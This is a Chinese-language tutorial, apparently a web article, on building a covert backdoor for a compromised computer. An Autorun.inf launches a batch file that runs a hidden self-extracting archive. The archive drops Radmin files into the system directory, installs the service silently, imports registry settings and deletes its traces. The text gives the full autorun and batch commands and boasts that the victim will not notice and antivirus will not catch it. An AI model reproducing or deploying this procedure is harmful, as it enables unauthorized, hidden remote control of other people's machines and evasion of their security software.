這里只需要你有上傳的權(quán)限。

一共三個(gè)文件：1.Autorun.inf、2.Shell.bat、3.Hao.exe(自解壓文件）。

思路：

全部放在C盤下。當(dāng)肉雞主人雙擊C盤時(shí)自動(dòng)運(yùn)行第一文件，第一文件帶動(dòng)運(yùn)行第二文件，同時(shí)第二運(yùn)行第三運(yùn)行完可正常進(jìn)入C盤。不會(huì)讓人發(fā)覺。并且里面所帶的批處理，會(huì)在最后把所有文件刪除。此時(shí)，后門卻已經(jīng)裝上去了（此法針對(duì)沒有權(quán)限運(yùn)行木馬的入侵活動(dòng)）。

制作：

[autorun] open=shell.bat，這個(gè)是autorun.inf @echo off hao.exe c:\windows\explorer c:\ del autorun.inf del rad.exe del shell.ba，這個(gè)是shell.bat hao.exe，里面包含admdll.dll、raddrv.dll、admin.reg、pchealthy.exe、r.bat五個(gè)文件（關(guān)鍵所在）r.bat——批處理做法 @echo off @pchealthy.exe /install /silence @regedit /s admin.reg @net start r_server @del admin.reg @del r.bat，其他四個(gè)就是Radmin的文件。這個(gè)大家都會(huì)，復(fù)制過來就行。

我們?cè)賮砜醋越鈮旱奶幚怼Ｔ诮鈮郝窂嚼镂覀冇?%systemroot%\system32，就是解壓到系統(tǒng)目錄里，并且“解壓后運(yùn)行”填上我們的r.bat文件。因?yàn)檫@里的文件比較多，比較隱蔽。解壓模式我們選 “全部隱藏”，和 “覆蓋所有文件”！ 好了，一個(gè)不被殺毒軟件所能查殺的好后門程序就成功制作出來了！

大家不要放在文件夾里壓縮哦，要直接選上admdll.dll、raddrv.dll、admin.reg、pchealthy.exe、r.bat五個(gè)文件壓縮，這樣就行啦。

責(zé)任編輯: 雪花(TEL:（010）68476636-8008)